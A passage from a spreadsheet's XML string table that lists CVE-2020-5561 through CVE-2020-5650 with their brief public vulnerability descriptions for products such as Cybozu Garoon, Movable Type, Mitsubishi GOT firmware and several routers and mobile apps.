    <t>WL-Enq 1.11 and 1.12 allows remote attackers to execute arbitrary OS commands with the administrative privilege via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5561</t>
  </si>
  <si>
    <t>Keijiban Tsumiki v1.15 allows remote attackers to execute arbitrary OS commands via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5562</t>
  </si>
  <si>
    <t>Server-side request forgery (SSRF) vulnerability in Cybozu Garoon 4.6.0 to 4.6.3 allows a remote attacker with an administrative privilege to issue arbitrary HTTP requests to other web servers via V-CUBE Meeting function.</t>
  </si>
  <si>
    <t>CVE-2020-5563</t>
  </si>
  <si>
    <t>Improper authentication vulnerability in Cybozu Garoon 4.0.0 to 4.10.3 allows remote attackers to obtain data in the affected product via the API.</t>
  </si>
  <si>
    <t>CVE-2020-5564</t>
  </si>
  <si>
    <t>Cross-site scripting vulnerability in Cybozu Garoon 4.0.0 to 4.10.3 allows remote attackers to inject arbitrary web script or HTML via the application 'E-mail'.</t>
  </si>
  <si>
    <t>CVE-2020-5565</t>
  </si>
  <si>
    <t>Improper input validation vulnerability in Cybozu Garoon 4.0.0 to 4.10.3 allows a remote authenticated attacker to alter the application's data via the applications 'Workflow' and 'MultiReport'.</t>
  </si>
  <si>
    <t>CVE-2020-5566</t>
  </si>
  <si>
    <t>Improper authorization vulnerability in Cybozu Garoon 4.0.0 to 4.10.3 allows remote authenticated attackers to alter the application's data via the applications 'E-mail' and 'Messages'.</t>
  </si>
  <si>
    <t>CVE-2020-5567</t>
  </si>
  <si>
    <t>Improper authentication vulnerability in Cybozu Garoon 4.0.0 to 4.10.3 allows remote attackers to obtain data in Application Menu.</t>
  </si>
  <si>
    <t>CVE-2020-5568</t>
  </si>
  <si>
    <t>Cross-site scripting vulnerability in Cybozu Garoon 4.6.0 to 5.0.0 allows remote attackers to inject arbitrary web script or HTML via the applications 'Messages' and 'Bulletin Board'.</t>
  </si>
  <si>
    <t>CVE-2020-5569</t>
  </si>
  <si>
    <t>An unquoted search path vulnerability exists in HDD Password tool (for Windows) version 1.20.6620 and earlier which is stored in CANVIO PREMIUM 3TB(HD-MB30TY, HD-MA30TY, HD-MB30TS, HD-MA30TS), CANVIO PREMIUM 2TB(HD-MB20TY, HD-MA20TY, HD-MB20TS, HD-MA20TS), CANVIO PREMIUM 1TB(HD-MB10TY, HD-MA10TY, HD-MB10TS, HD-MA10TS), CANVIO SLIM 1TB(HD-SB10TK, HD-SB10TS), and CANVIO SLIM 500GB(HD-SB50GK, HD-SA50GK, HD-SB50GS, HD-SA50GS), and which was downloaded before 2020 May 10. Since it registers Windows services with unquoted file paths, when a registered path contains spaces, and a malicious executable is placed on a certain path, it may be executed with the privilege of the Windows service.</t>
  </si>
  <si>
    <t>CVE-2020-5570</t>
  </si>
  <si>
    <t>Cross-site scripting vulnerability in Sales Force Assistant version 11.2.48 and earlier allows remote authenticated attackers to inject arbitrary web script or HTML via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5571</t>
  </si>
  <si>
    <t>SHARP AQUOS series (AQUOS SH-M02 build number 01.00.05 and earlier, AQUOS SH-RM02 build number 01.00.04 and earlier, AQUOS mini SH-M03 build number 01.00.04 and earlier, AQUOS Keitai SH-N01 build number 01.00.01 and earlier, AQUOS L2 (UQ mobile/J:COM) build number 01.00.05 and earlier, AQUOS sense lite SH-M05 build number 03.00.04 and earlier, AQUOS sense (UQ mobile) build number 03.00.03 and earlier, AQUOS compact SH-M06 build number 02.00.02 and earlier, AQUOS sense plus SH-M07 build number 02.00.02 and earlier, AQUOS sense2 SH-M08 build number 02.00.05 and earlier, and AQUOS sense2 (UQ mobile) build number 02.00.06 and earlier) allow an attacker to obtain the sensitive information of the device via malicious applications installed on the device.</t>
  </si>
  <si>
    <t>CVE-2020-5572</t>
  </si>
  <si>
    <t>Android App 'Mailwise for Android' 1.0.0 to 1.0.1 allows an attacker to obtain credential information registered in the product via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5573</t>
  </si>
  <si>
    <t>Android App 'kintone mobile for Android' 1.0.0 to 2.5 allows an attacker to obtain credential information registered in the product via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5574</t>
  </si>
  <si>
    <t>HTML attribute value injection vulnerability in Movable Type series (Movable Type 7 r.4606 (7.2.1) and earlier (Movable Type 7), Movable Type Advanced 7 r.4606 (7.2.1) and earlier (Movable Type Advanced 7), Movable Type for AWS 7 r.4606 (7.2.1) and earlier (Movable Type for AWS 7), Movable Type 6.5.3 and earlier (Movable Type 6.5), Movable Type Advanced 6.5.3 and earlier (Movable Type Advanced 6.5), Movable Type 6.3.11 and earlier (Movable Type 6.3), Movable Type Advanced 6.3.11 and earlier (Movable Type 6.3), Movable Type Premium 1.29 and earlier, and Movable Type Premium Advanced 1.29 and earlier) allows remote attackers to inject arbitrary HTML attribute value via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5575</t>
  </si>
  <si>
    <t>Cross-site scripting vulnerability in Movable Type series (Movable Type 7 r.4606 (7.2.1) and earlier (Movable Type 7), Movable Type Advanced 7 r.4606 (7.2.1) and earlier (Movable Type Advanced 7), Movable Type for AWS 7 r.4606 (7.2.1) and earlier (Movable Type for AWS 7), Movable Type 6.5.3 and earlier (Movable Type 6.5), Movable Type Advanced 6.5.3 and earlier (Movable Type Advanced 6.5), Movable Type 6.3.11 and earlier (Movable Type 6.3), Movable Type Advanced 6.3.11 and earlier (Movable Type 6.3), Movable Type Premium 1.29 and earlier, and Movable Type Premium Advanced 1.29 and earlier) allows remote attackers to inject arbitrary script or HTML via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5576</t>
  </si>
  <si>
    <t>Cross-site request forgery (CSRF) vulnerability in Movable Type series (Movable Type 7 r.4606 (7.2.1) and earlier (Movable Type 7), Movable Type Advanced 7 r.4606 (7.2.1) and earlier (Movable Type Advanced 7), Movable Type for AWS 7 r.4606 (7.2.1) and earlier (Movable Type for AWS 7), Movable Type 6.5.3 and earlier (Movable Type 6.5), Movable Type Advanced 6.5.3 and earlier (Movable Type Advanced 6.5), Movable Type 6.3.11 and earlier (Movable Type 6.3), Movable Type Advanced 6.3.11 and earlier (Movable Type 6.3), Movable Type Premium 1.29 and earlier, and Movable Type Premium Advanced 1.29 and earlier) allows remote attackers to hijack the authentication of administrators via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5577</t>
  </si>
  <si>
    <t>Movable Type series (Movable Type 7 r.4606 (7.2.1) and earlier (Movable Type 7), Movable Type Advanced 7 r.4606 (7.2.1) and earlier (Movable Type Advanced 7), Movable Type for AWS 7 r.4606 (7.2.1) and earlier (Movable Type for AWS 7), Movable Type 6.5.3 and earlier (Movable Type 6.5), Movable Type Advanced 6.5.3 and earlier (Movable Type Advanced 6.5), Movable Type 6.3.11 and earlier (Movable Type 6.3), Movable Type Advanced 6.3.11 and earlier (Movable Type 6.3), Movable Type Premium 1.29 and earlier, and Movable Type Premium Advanced 1.29 and earlier) allow remote authenticated attackers to upload arbitrary files and execute a php script via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5579</t>
  </si>
  <si>
    <t>SQL injection vulnerability in the Paid Memberships versions prior to 2.3.3 allows attacker with administrator rights to execute arbitrary SQL commands via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5580</t>
  </si>
  <si>
    <t>Cybozu Garoon 4.0.0 to 5.0.1 allows remote authenticated attackers to bypass access restriction to view and/or alter Single sign-on settings via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5581</t>
  </si>
  <si>
    <t>Path traversal vulnerability in Cybozu Garoon 4.0.0 to 5.0.1 allows remote authenticated attackers to obtain unintended information via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5582</t>
  </si>
  <si>
    <t>Cybozu Garoon 4.0.0 to 5.0.1 allows remote authenticated attackers to bypass access restriction to alter the data for the file attached to Report via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5583</t>
  </si>
  <si>
    <t>Cybozu Garoon 4.0.0 to 5.0.1 allows remote authenticated attackers to bypass access restriction to obtain unauthorized Multi-Report's data via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5584</t>
  </si>
  <si>
    <t>Cybozu Garoon 4.0.0 to 5.0.1 allow remote attackers to obtain unintended information via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5585</t>
  </si>
  <si>
    <t>Cross-site scripting vulnerability in Cybozu Garoon 5.0.0 to 5.0.1 allows attacker with administrator rights to inject an arbitrary script via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5586</t>
  </si>
  <si>
    <t>Cross-site scripting vulnerability in Cybozu Garoon 4.10.3 to 5.0.1 allows attacker with administrator rights to inject an arbitrary script via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5587</t>
  </si>
  <si>
    <t>Cybozu Garoon 4.0.0 to 5.0.1 allow remote authenticated attackers to obtain unintended information via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5588</t>
  </si>
  <si>
    <t>Path traversal vulnerability in Cybozu Garoon 5.0.0 to 5.0.1 allows attacker with administrator rights to obtain unintended information via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5589</t>
  </si>
  <si>
    <t>SONY Wireless Headphones WF-1000X, WF-SP700N, WH-1000XM2, WH-1000XM3, WH-CH700N, WH-H900N, WH-XB700, WH-XB900N, WI-1000X, WI-C600N and WI-SP600N with firmware versions prior to 4.5.2 have vulnerability that someone within the Bluetooth range can make the Bluetooth pairing and operate such as changing volume of the product.</t>
  </si>
  <si>
    <t>CVE-2020-5590</t>
  </si>
  <si>
    <t>Directory traversal vulnerability in EC-CUBE 3.0.0 to 3.0.18 and 4.0.0 to 4.0.3 allows remote authenticated attackers to delete arbitrary files and/or directories on the server via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5591</t>
  </si>
  <si>
    <t>XACK DNS 1.11.0 to 1.11.4, 1.10.0 to 1.10.8, 1.8.0 to 1.8.23, 1.7.0 to 1.7.18, and versions before 1.7.0 allow remote attackers to cause a denial of service condition resulting in degradation of the recursive resolver's performance or compromising the recursive resolver as a reflector in a reflection attack.</t>
  </si>
  <si>
    <t>CVE-2020-5592</t>
  </si>
  <si>
    <t>Cross-site scripting vulnerability in Zenphoto versions prior to 1.5.7 allows remote attackers to inject an arbitrary JavaScript via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5593</t>
  </si>
  <si>
    <t>Zenphoto versions prior to 1.5.7 allows an attacker to conduct PHP code injection attacks by leading a user to upload a specially crafted .zip file.</t>
  </si>
  <si>
    <t>CVE-2020-5594</t>
  </si>
  <si>
    <t>Mitsubishi Electric MELSEC iQ-R, iQ-F, Q, L, and FX series CPU modules all versions contain a vulnerability that allows cleartext transmission of sensitive information between CPU modules and GX Works3 and/or GX Works2 via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5595</t>
  </si>
  <si>
    <t>TCP/IP function included in the firmware of Mitsubishi Electric GOT2000 series (CoreOS with version -Y and earlier installed in GT27 Model, GT25 Model, and GT23 Model) contains a buffer overflow vulnerability, which may allow a remote attacker to stop the network functions of the products or execute a malicious program via a specially crafted packet.</t>
  </si>
  <si>
    <t>CVE-2020-5596</t>
  </si>
  <si>
    <t>TCP/IP function included in the firmware of Mitsubishi Electric GOT2000 series (CoreOS with version -Y and earlier installed in GT27 Model, GT25 Model, and GT23 Model) does not properly manage sessions, which may allow a remote attacker to stop the network functions of the products or execute a malicious program via a specially crafted packet.</t>
  </si>
  <si>
    <t>CVE-2020-5597</t>
  </si>
  <si>
    <t>TCP/IP function included in the firmware of Mitsubishi Electric GOT2000 series (CoreOS with version -Y and earlier installed in GT27 Model, GT25 Model, and GT23 Model) contains a null pointer dereference vulnerability, which may allow a remote attacker to stop the network functions of the products or execute a malicious program via a specially crafted packet.</t>
  </si>
  <si>
    <t>CVE-2020-5598</t>
  </si>
  <si>
    <t>TCP/IP function included in the firmware of Mitsubishi Electric GOT2000 series (CoreOS with version -Y and earlier installed in GT27 Model, GT25 Model, and GT23 Model) contains an improper access control vulnerability, which may which may allow a remote attacker tobypass access restriction and stop the network functions of the products or execute a malicious program via a specially crafted packet.</t>
  </si>
  <si>
    <t>CVE-2020-5599</t>
  </si>
  <si>
    <t>TCP/IP function included in the firmware of Mitsubishi Electric GOT2000 series (CoreOS with version -Y and earlier installed in GT27 Model, GT25 Model, and GT23 Model) contains an improper neutralization of argument delimiters in a command ('Argument Injection') vulnerability, which may allow a remote attacker to stop the network functions of the products or execute a malicious program via a specially crafted packet.</t>
  </si>
  <si>
    <t>CVE-2020-5600</t>
  </si>
  <si>
    <t>TCP/IP function included in the firmware of Mitsubishi Electric GOT2000 series (CoreOS with version -Y and earlier installed in GT27 Model, GT25 Model, and GT23 Model) contains a resource management error vulnerability, which may allow a remote attacker to stop the network functions of the products or execute a malicious program via a specially crafted packet.</t>
  </si>
  <si>
    <t>CVE-2020-5601</t>
  </si>
  <si>
    <t>Chrome Extension for e-Tax Reception System Ver1.0.0.0 allows remote attackers to execute an arbitrary command via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5602</t>
  </si>
  <si>
    <t>Mitsubishi Electoric FA Engineering Software (CPU Module Logging Configuration Tool Ver. 1.94Y and earlier, CW Configurator Ver. 1.010L and earlier, EM Software Development Kit (EM Configurator) Ver. 1.010L and earlier, GT Designer3 (GOT2000) Ver. 1.221F and earlier, GX LogViewer Ver. 1.96A and earlier, GX Works2 Ver. 1.586L and earlier, GX Works3 Ver. 1.058L and earlier, M_CommDTM-HART Ver. 1.00A, M_CommDTM-IO-Link Ver. 1.02C and earlier, MELFA-Works Ver. 4.3 and earlier, MELSEC-L Flexible High-Speed I/O Control Module Configuration Tool Ver.1.004E and earlier, MELSOFT FieldDeviceConfigurator Ver. 1.03D and earlier, MELSOFT iQ AppPortal Ver. 1.11M and earlier, MELSOFT Navigator Ver. 2.58L and earlier, MI Configurator Ver. 1.003D and earlier, Motion Control Setting Ver. 1.005F and earlier, MR Configurator2 Ver. 1.72A and earlier, MT Works2 Ver. 1.156N and earlier, RT ToolBox2 Ver. 3.72A and earlier, and RT ToolBox3 Ver. 1.50C and earlier) allows an attacker to conduct XML External Entity (XXE) attacks via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5603</t>
  </si>
  <si>
    <t>Uncontrolled resource consumption vulnerability in Mitsubishi Electoric FA Engineering Software (CPU Module Logging Configuration Tool Ver. 1.94Y and earlier, CW Configurator Ver. 1.010L and earlier, EM Software Development Kit (EM Configurator) Ver. 1.010L and earlier, GT Designer3 (GOT2000) Ver. 1.221F and earlier, GX LogViewer Ver. 1.96A and earlier, GX Works2 Ver. 1.586L and earlier, GX Works3 Ver. 1.058L and earlier, M_CommDTM-HART Ver. 1.00A, M_CommDTM-IO-Link Ver. 1.02C and earlier, MELFA-Works Ver. 4.3 and earlier, MELSEC-L Flexible High-Speed I/O Control Module Configuration Tool Ver.1.004E and earlier, MELSOFT FieldDeviceConfigurator Ver. 1.03D and earlier, MELSOFT iQ AppPortal Ver. 1.11M and earlier, MELSOFT Navigator Ver. 2.58L and earlier, MI Configurator Ver. 1.003D and earlier, Motion Control Setting Ver. 1.005F and earlier, MR Configurator2 Ver. 1.72A and earlier, MT Works2 Ver. 1.156N and earlier, RT ToolBox2 Ver. 3.72A and earlier, and RT ToolBox3 Ver. 1.50C and earlier) allows an attacker to cause a denial of service (DoS) condition attacks via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5604</t>
  </si>
  <si>
    <t>Android App 'Mercari' (Japan version) prior to version 3.52.0 allows arbitrary method execution of a Java object by a remote attacker via a Man-In-The-Middle attack by using Java Reflection API of JavaScript code on WebView.</t>
  </si>
  <si>
    <t>CVE-2020-5605</t>
  </si>
  <si>
    <t>Directory traversal vulnerability in WHR-G54S firmware 1.43 and earlier allows an attacker to access sensitive information such as setting values via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5606</t>
  </si>
  <si>
    <t>Cross-site scripting vulnerability in WHR-G54S firmware 1.43 and earlier allows remote attackers to inject arbitrary script via a specially crafted page.</t>
  </si>
  <si>
    <t>CVE-2020-5607</t>
  </si>
  <si>
    <t>Open redirect vulnerability in SHIRASAGI v1.13.1 and earlier allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5608</t>
  </si>
  <si>
    <t>CAMS for HIS CENTUM CS 3000 (includes CENTUM CS 3000 Small) R3.08.10 to R3.09.50, CENTUM VP (includes CENTUM VP Small, Basic) R4.01.00 to R6.07.00, B/M9000CS R5.04.01 to R5.05.01, and B/M9000 VP R6.01.01 to R8.03.01 allows a remote unauthenticated attacker to bypass authentication and send altered communication packets via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5609</t>
  </si>
  <si>
    <t>Directory traversal vulnerability in CAMS for HIS CENTUM CS 3000 (includes CENTUM CS 3000 Small) R3.08.10 to R3.09.50, CENTUM VP (includes CENTUM VP Small, Basic) R4.01.00 to R6.07.00, B/M9000CS R5.04.01 to R5.05.01, and B/M9000 VP R6.01.01 to R8.03.01 allows a remote unauthenticated attacker to create or overwrite arbitrary files and run arbitrary commands via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5610</t>
  </si>
  <si>
    <t>Global TechStream (GTS) for TOYOTA dealers version 15.10.032 and earlier allows an attacker to cause a denial-of-service (DoS) condition and execute arbitrary code via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5611</t>
  </si>
  <si>
    <t>Cross-site request forgery (CSRF) vulnerability in Social Sharing Plugin versions prior to 1.2.10 allows remote attackers to hijack the authentication of administrators via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5612</t>
  </si>
  <si>
    <t>Cross-site scripting vulnerability in KonaWiki 2.2.0 and earlier allows remote attackers to execute an arbitrary script via a specially crafted URL.</t>
  </si>
  <si>
    <t>CVE-2020-5613</t>
  </si>
  <si>
    <t>Cross-site scripting vulnerability in KonaWiki 3.1.0 and earlier allows remote attackers to execute an arbitrary script via a specially crafted URL.</t>
  </si>
  <si>
    <t>CVE-2020-5614</t>
  </si>
  <si>
    <t>Directory traversal vulnerability in KonaWiki 3.1.0 and earlier allows remote attackers to read arbitrary files via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5615</t>
  </si>
  <si>
    <t>Cross-site request forgery (CSRF) vulnerability in [Calendar01] free edition ver1.0.0 and [Calendar02] free edition ver1.0.0 allows remote attackers to hijack the authentication of administrators via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5616</t>
  </si>
  <si>
    <t>[Calendar01], [Calendar02], [PKOBO-News01], [PKOBO-vote01], [Telop01], [Gallery01], [CalendarForm01], and [Link01] [Calendar01] free edition ver1.0.0, [Calendar02] free edition ver1.0.0, [PKOBO-News01] free edition ver1.0.3 and earlier, [PKOBO-vote01] free edition ver1.0.1 and earlier, [Telop01] free edition ver1.0.0, [Gallery01] free edition ver1.0.3 and earlier, [CalendarForm01] free edition ver1.0.3 and earlier, and [Link01] free edition ver1.0.0 allows remote attackers to bypass authentication and log in to the product with administrative privileges via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5617</t>
  </si>
  <si>
    <t>Privilege escalation vulnerability in SKYSEA Client View Ver.12.200.12n to 15.210.05f allows an attacker to obtain unauthorized privileges and modify/obtain sensitive information or perform unintended operations via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5619</t>
  </si>
  <si>
    <t>Cross-site scripting vulnerability in Exment prior to v3.6.0 allows remote authenticated attackers to inject arbitrary script or HTML via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5620</t>
  </si>
  <si>
    <t>Cross-site scripting vulnerability in Exment prior to v3.6.0 allows remote authenticated attackers to inject arbitrary script or HTML via a specially crafted file.</t>
  </si>
  <si>
    <t>CVE-2020-5621</t>
  </si>
  <si>
    <t>Cross-site request forgery (CSRF) vulnerability in NETGEAR switching hubs (GS716Tv2 Firmware version 5.4.2.30 and earlier, and GS724Tv3 Firmware version 5.4.2.30 and earlier) allow remote attackers to hijack the authentication of administrators and alter the settings of the device via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5622</t>
  </si>
  <si>
    <t>Shadankun Server Security Type (excluding normal blocking method types) Ver.1.5.3 and earlier allows remote attackers to cause a denial of service which may result in not being able to add newly detected attack source IP addresses as blocking targets for about 10 minutes via a specially crafted request.</t>
  </si>
  <si>
    <t>CVE-2020-5623</t>
  </si>
  <si>
    <t>NITORI App for Android versions 6.0.4 and earlier and NITORI App for iOS versions 6.0.2 and earlier allow remote attackers to lead a user to access an arbitrary website via the vulnerable App. As a result, the user may become a victim of a phishing attack.</t>
  </si>
  <si>
    <t>CVE-2020-5624</t>
  </si>
  <si>
    <t>SQL injection vulnerability in the XooNIps 3.48 and earlier allows remote attackers to execute arbitrary SQL commands via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5625</t>
  </si>
  <si>
    <t>Cross-site scripting vulnerability in XooNIps 3.48 and earlier allows remote attackers to inject an arbitrary script via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5626</t>
  </si>
  <si>
    <t>Logstorage version 8.0.0 and earlier, and ELC Analytics version 3.0.0 and earlier allow remote attackers to execute arbitrary OS commands via a specially crafted log file.</t>
  </si>
  <si>
    <t>CVE-2020-5627</t>
  </si>
  <si>
    <t>Yodobashi App for Android versions 1.8.7 and earlier allows remote attackers to lead a user to access an arbitrary website via the vulnerable App. As a result, the user may become a victim of a phishing attack.</t>
  </si>
  <si>
    <t>CVE-2020-5628</t>
  </si>
  <si>
    <t>UNIQLO App for Android versions 7.3.3 and earlier allows remote attackers to lead a user to access an arbitrary website via the vulnerable App. As a result, if the access destination is a malicious website, the user may fall victim to the social engineering attack.</t>
  </si>
  <si>
    <t>CVE-2020-5629</t>
  </si>
  <si>
    <t>UNIQLO App for Android versions 7.3.3 and earlier allows remote attackers to lead a user to access an arbitrary website via a malicious App created by the third party. As a result, if the access destination is a malicious website, the user may fall victim to the social engineering attack.</t>
  </si>
  <si>
    <t>CVE-2020-5631</t>
  </si>
  <si>
    <t>Stored cross-site scripting vulnerability in CMONOS.JP ver2.0.20191009 and earlier allows remote attackers to inject arbitrary script via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5632</t>
  </si>
  <si>
    <t>InfoCage SiteShell series (Host type SiteShell for IIS V1.4, V1.5, and V1.6, Host type SiteShell for IIS prior to revision V2.0.0.6, V2.1.0.7, V2.1.1.6, V3.0.0.11, V4.0.0.6, V4.1.0.5, and V4.2.0.1, Host type SiteShell for Apache Windows V1.4, V1.5, and V1.6, and Host type SiteShell for Apache Windows prior to revision V2.0.0.6, V2.1.0.7, V2.1.1.6, V3.0.0.11, V4.0.0.6, V4.1.0.5, and V4.2.0.1) allow authenticated attackers to bypass access restriction and to execute arbitrary code with an elevated privilege via a specially crafted executable files.</t>
  </si>
  <si>
    <t>CVE-2020-5633</t>
  </si>
  <si>
    <t>Multiple NEC products (Express5800/T110j, Express5800/T110j-S, Express5800/T110j (2nd-Gen), Express5800/T110j-S (2nd-Gen), iStorage NS100Ti, and Express5800/GT110j) where Baseboard Management Controller (BMC) firmware Rev1.09 and earlier is applied allows remote attackers to bypass authentication and then obtain/modify BMC setting information, obtain monitoring information, or reboot/shut down the vulnerable product via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5634</t>
  </si>
  <si>
    <t>ELECOM LAN routers (WRC-2533GST2 firmware versions prior to v1.14, WRC-1900GST2 firmware versions prior to v1.14, WRC-1750GST2 firmware versions prior to v1.14, and WRC-1167GST2 firmware versions prior to v1.10) allow an attacker on the same network segment to execute arbitrary OS commands with a root privilege via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5635</t>
  </si>
  <si>
    <t>Aterm SA3500G firmware versions prior to Ver. 3.5.9 allows an attacker on the adjacent network to send a specially crafted request to a specific URL, which may result in an arbitrary command execution.</t>
  </si>
  <si>
    <t>CVE-2020-5636</t>
  </si>
  <si>
    <t>Aterm SA3500G firmware versions prior to Ver. 3.5.9 allows an attacker with an administrative privilege to send a specially crafted request to a specific URL, which may result in an arbitrary command execution.</t>
  </si>
  <si>
    <t>CVE-2020-5637</t>
  </si>
  <si>
    <t>Improper validation of integrity check value vulnerability in Aterm SA3500G firmware versions prior to Ver. 3.5.9 allows an attacker with an administrative privilege to execute a malicious program.</t>
  </si>
  <si>
    <t>CVE-2020-5638</t>
  </si>
  <si>
    <t>Cross-site scripting vulnerability in desknet's NEO (desknet's NEO Small License V5.5 R1.5 and earlier, and desknet's NEO Enterprise License V5.5 R1.5 and earlier) allows remote attackers to inject arbitrary script via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5639</t>
  </si>
  <si>
    <t>Directory traversal vulnerability in FileZen versions from V3.0.0 to V4.2.2 allows remote attackers to upload an arbitrary file in a specific directory via unspecified vectors. As a result, an arbitrary OS command may be executed.</t>
  </si>
  <si>
    <t>CVE-2020-5640</t>
  </si>
  <si>
    <t>Local file inclusion vulnerability in OneThird CMS v1.96c and earlier allows a remote unauthenticated attacker to execute arbitrary code or obtain sensitive information via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5641</t>
  </si>
  <si>
    <t>Cross-site request forgery (CSRF) vulnerability in GS108Ev3 firmware version 2.06.10 and earlier allows remote attackers to hijack the authentication of administrators and the product's settings may be changed without the user's intention or consent via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5642</t>
  </si>
  <si>
    <t>Cross-site request forgery (CSRF) vulnerability in Live Chat - Live support version 3.1.0 and earlier allows remote attackers to hijack the authentication of administrators via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5643</t>
  </si>
  <si>
    <t>Improper input validation vulnerability in Cybozu Garoon 5.0.0 to 5.0.2 allows a remote authenticated attacker to delete some data of the bulletin board via unspecified vector.</t>
  </si>
  <si>
    <t>CVE-2020-5644</t>
  </si>
  <si>
    <t>Buffer overflow vulnerability in TCP/IP function included in the firmware of GT14 Model of GOT 1000 series (GT1455-QTBDE CoreOS version "05.65.00.BD" and earlier, GT1450-QMBDE CoreOS version "05.65.00.BD" and earlier, GT1450-QLBDE CoreOS version "05.65.00.BD" and earlier, GT1455HS-QTBDE CoreOS version "05.65.00.BD" and earlier, and GT1450HS-QMBDE CoreOS version "05.65.00.BD" and earlier) allows a remote unauthenticated attacker to stop the network functions of the products or execute a malicious program via a specially crafted packet.</t>
  </si>
  <si>
    <t>CVE-2020-5645</t>
  </si>
  <si>
    <t>Session fixation vulnerability in TCP/IP function included in the firmware of GT14 Model of GOT 1000 series (GT1455-QTBDE CoreOS version "05.65.00.BD" and earlier, GT1450-QMBDE CoreOS version "05.65.00.BD" and earlier, GT1450-QLBDE CoreOS version "05.65.00.BD" and earlier, GT1455HS-QTBDE CoreOS version "05.65.00.BD" and earlier, and GT1450HS-QMBDE CoreOS version "05.65.00.BD" and earlier) allows a remote unauthenticated attacker to stop the network functions of the products via a specially crafted packet.</t>
  </si>
  <si>
    <t>CVE-2020-5646</t>
  </si>
  <si>
    <t>NULL pointer dereferences vulnerability in TCP/IP function included in the firmware of GT14 Model of GOT 1000 series (GT1455-QTBDE CoreOS version "05.65.00.BD" and earlier, GT1450-QMBDE CoreOS version "05.65.00.BD" and earlier, GT1450-QLBDE CoreOS version "05.65.00.BD" and earlier, GT1455HS-QTBDE CoreOS version "05.65.00.BD" and earlier, and GT1450HS-QMBDE CoreOS version "05.65.00.BD" and earlier) allows a remote unauthenticated attacker to stop the network functions of the products via a specially crafted packet.</t>
  </si>
  <si>
    <t>CVE-2020-5647</t>
  </si>
  <si>
    <t>Improper access control vulnerability in TCP/IP function included in the firmware of GT14 Model of GOT 1000 series (GT1455-QTBDE CoreOS version ’05.65.00.BD’ and earlier, GT1450-QMBDE CoreOS version ’05.65.00.BD’ and earlier, GT1450-QLBDE CoreOS version ’05.65.00.BD’ and earlier, GT1455HS-QTBDE CoreOS version ’05.65.00.BD’ and earlier, and GT1450HS-QMBDE CoreOS version ’05.65.00.BD’ and earlier) allows a remote unauthenticated attacker to stop the network functions of the products or execute a malicious program via a specially crafted packet.</t>
  </si>
  <si>
    <t>CVE-2020-5648</t>
  </si>
  <si>
    <t>Improper neutralization of argument delimiters in a command ('Argument Injection') vulnerability in TCP/IP function included in the firmware of GT14 Model of GOT 1000 series (GT1455-QTBDE CoreOS version "05.65.00.BD" and earlier, GT1450-QMBDE CoreOS version "05.65.00.BD" and earlier, GT1450-QLBDE CoreOS version "05.65.00.BD" and earlier, GT1455HS-QTBDE CoreOS version "05.65.00.BD" and earlier, and GT1450HS-QMBDE CoreOS version "05.65.00.BD" and earlier) allows unauthenticated attackers on adjacent network to stop the network functions of the products via a specially crafted packet.</t>
  </si>
  <si>
    <t>CVE-2020-5649</t>
  </si>
  <si>
    <t>Resource management error vulnerability in TCP/IP function included in the firmware of GT14 Model of GOT 1000 series (GT1455-QTBDE CoreOS version "05.65.00.BD" and earlier, GT1450-QMBDE CoreOS version "05.65.00.BD" and earlier, GT1450-QLBDE CoreOS version "05.65.00.BD" and earlier, GT1455HS-QTBDE CoreOS version "05.65.00.BD" and earlier, and GT1450HS-QMBDE CoreOS version "05.65.00.BD" and earlier) allows a remote unauthenticated attacker to stop the network functions of the products via a specially crafted packet.</t>
  </si>
  <si>
    <t>CVE-2020-5650</t>
  </si>
  <si>
